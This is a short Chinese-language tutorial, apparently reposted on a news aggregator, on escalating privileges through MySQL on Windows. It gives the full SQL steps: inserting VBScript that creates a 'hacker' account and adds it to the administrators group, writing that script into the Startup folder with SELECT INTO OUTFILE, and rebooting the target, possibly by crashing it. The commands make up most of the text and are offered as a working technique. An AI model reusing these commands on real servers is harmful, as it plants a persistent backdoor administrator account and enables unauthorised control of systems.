• 開機啟動項提權原理:利用mysql,将後門寫入開機自啟動項。同時因為是開機自啟動,寫入之後,需要重啟目标服務器。(這個要求mysql的權限就很高,至少是管理員權限甚至是system,可以利用一些漏洞嘗試打藍屏重啟)
• windows的開機啟動地址:
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
1、利用UDF提權得到的shell
UDF提權的到的shell
2、創建表create table dota(cmd text);
創建表
3、插入數據insert into dota values("set wshshell=createobject(""wscript.shell"")"),("a=wshshell.run(""cmd.exe /c net user hacker admin@123 /add"",0)"),("b=wshshell.run(""cmd.exe /c net localgroup administrators hacker /add"",0)");
插入啟動腳本數據
4、寫入開機啟動文件select * from dota into outfile " C:\\Users\\Administrator.WIN702\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\adduser.vbs";
寫入開機啟動文件
5、查看開機啟動文件
查看開機啟動文件
6、重啟開機啟動
開機啟動
•開機啟動,發現 hacker 賬戶已經增加成功
,更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!